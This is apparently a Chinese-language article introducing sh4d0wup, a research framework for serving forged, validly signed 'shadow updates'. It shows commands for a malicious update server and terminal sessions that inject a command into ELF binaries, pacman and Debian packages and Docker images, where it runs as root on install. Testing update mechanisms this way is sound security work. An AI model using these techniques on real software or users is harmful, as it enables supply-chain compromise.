关于sh4d0wup

你有没有想过，你下载的更新是其他人都得到的更新，还是你得到的只是为你做的不同的更新？sh4d0wup是一款功能强大的签名密钥与更新漏洞利用框架，而sh4d0wup名字主要针对的是Shadow update（影子更新）。

所谓Shadow update，是指官方不存在的更新，但带有有效签名，并会被客户视为真实的更新。如果签名密钥被黑客泄露，或者拥有合法访问权限的发布工程师想做坏事的话，就会发生这种情况。

sh4d0wup本质上是一个http/https更新服务器，在合法服务器面前充当反向代理，可以感染并签署各种工具、文件或代码格式。广大研究人员可以使用该工具来研究和测试自己系统的更新机制是否安全健壮。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地：

git clone https://github.com/kpcyrd/sh4d0wup.git

编译一个Plot

某些Plot的运行非常复杂，为了避免工具配置时间过长，我们可以预先构建好一个Plot，并提前创建好签名：

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

运行一个Plot

下列命令将会根据Plot配置生成一个恶意HTTP更新服务器，并接收YAML文件：

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

下面给出的是YAML文件样例：

contrib/plot-archlinux.yaml

contrib/plot-debian.yaml

contrib/plot-rustup.yaml

contrib/plot-curl-sh.yaml

感染一个文件

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out

[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Spawning C compiler...

[2022-12-19T23:50:52Z INFO  sh4d0wup::infect::elf] Generating source code...

[2022-12-19T23:50:57Z INFO  sh4d0wup::infect::elf] Waiting for compile to finish...

[2022-12-19T23:51:01Z INFO  sh4d0wup::infect::elf] Successfully generated binary

% ./a.out help

uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)

Usage: a.out [OPTIONS] <COMMAND>

 

Commands:

  bait         开启一台恶意更新服务器

  infect        高级篡改模式，将附加命令注入到代码包中

  tamper     低级篡改模式，修补程序包数据库以添加恶意程序包、触发更新或影响依赖项解决方案

  keygen       使用给定参数生成签名密钥

  sign          使用签名密钥生成签名

  hsm          与硬件签名密钥交互

  build         基于Plot编译攻击行为

  check       检测Plot是否仍然可以执行

  completions  生成Shell脚本

  help         打印工具帮助信息

 

Options:

  -v, --verbose...   开启调试模式

  -h, --help        打印工具帮助信息

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst

[2022-12-09T16:08:11Z INFO  sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...

% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst

loading packages...

resolving dependencies...

looking for conflicting packages...

 

Packages (1) sh4d0wup-0.2.0-2

 

Total Installed Size:  13.36 MiB

Net Upgrade Size:       0.00 MiB

 

:: Proceed with installation? [Y/n]

(1/1) checking keys in keyring                                         [#######################################] 100%

(1/1) checking package integrity                                       [#######################################] 100%

(1/1) loading package files                                            [#######################################] 100%

(1/1) checking for file conflicts                                      [#######################################] 100%

(1/1) checking available disk space                                    [#######################################] 100%

:: Processing package changes...

(1/1) upgrading sh4d0wup                                               [#######################################] 100%

uid=0(root) gid=0(root) groups=0(root)

:: Running post-transaction hooks...

(1/2) Arming ConditionNeedsUpdate...

(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1

[2022-12-09T16:28:02Z INFO  sh4d0wup::infect::deb] Patching "control.tar.xz"

% sudo apt install ./apt_2.2.4-1_amd64.deb

Reading package lists... Done

Building dependency tree... Done

Reading state information... Done

Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'

Suggested packages:

  apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base

Recommended packages:

  ca-certificates

The following packages will be upgraded:

  apt

1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

Need to get 0 B/1491 kB of archives.

After this operation, 0 B of additional disk space will be used.

Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]

debconf: delaying package configuration, since apt-utils is not installed

(Reading database ... 6661 files and directories currently installed.)

Preparing to unpack /apt_2.2.4-1_amd64.deb ...

Unpacking apt (2.2.4-1) over (2.2.4) ...

Setting up apt (2.2.4-1) ...

uid=0(root) gid=0(root) groups=0(root)

Processing triggers for libc-bin (2.31-13+deb11u5) ...

sh4d0wup infect oci

% docker pull alpine:edge

% docker save alpine:edge > alpine-edge.tar

% sh4d0wup infect oci alpine-edge.tar infected.tar -c id -t infected:latest

[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Original image is referencing config "121d0da757518198deeb7d1df20aaae549834f8bc77195bbf5be1900c0144cff.json": LayerConfig { config: Some(Config { user: Some(""), exposed_ports: None, env: Some(["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]), entrypoint: None, cmd: Some(["/bin/sh"]), volumes: None, working_dir: Some(""), labels: None, stop_signal: None }), rootfs: Some(RootFs { type: "layers", diff_ids: ["sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"] }), extra: {"container_config": Object {"AttachStderr": Bool(false), "AttachStdin": Bool(false), "AttachStdout": Bool(false), "Cmd": Array [String("/bin/sh"), String("-c"), String("#(nop) "), String("CMD [\"/bin/sh\"]")], "Domainname": String(""), "Entrypoint": Null, "Env": Array [String("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")], "Hostname": String("457781b778a4"), "Image": String("sha256:28d4c3ce9341a318d475e64365e47a34d5b9ba6c670bed35ce90b2402296ead6"), "Labels": Object {}, "OnBuild": Null, "OpenStdin": Bool(false), "StdinOnce": Bool(false), "Tty": Bool(false), "User": String(""), "Volumes": Null, "WorkingDir": String("")}, "architecture": String("amd64"), "created": String("2022-11-10T20:19:29.043621251Z"), "history": Array [Object {"created": String("2022-11-10T20:19:28.834390785Z"), "created_by": String("/bin/sh -c #(nop) ADD file:51c4407dc777648e8ebc8e124b05feb1807699ade513b6006a9a409f6b0f6f51 in / ")}, Object {"created": String("2022-11-10T20:19:29.043621251Z"), "created_by": String("/bin/sh -c #(nop)  CMD [\"/bin/sh\"]"), "empty_layer": Bool(true)}], "os": String("linux"), "docker_version": String("20.10.12"), "container": String("457781b778a449c9eac455ca1a18300a4041cb2b0d2d3f979460d19d7632ebf7")} }

[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Creating new layer in image: "patched"

[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Generating filesystem layer for payload: "id"

[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Updating tags of image to ["infected:latest"]

[2022-12-12T00:31:17Z INFO  sh4d0wup::infect::oci] Writing modified manifest...

% docker load -i infected.tar

Loaded image: infected:latest

% docker run -it infected echo hello world

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

hello world

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可证协议。

项目地址

sh4d0wup：【GitHub传送门】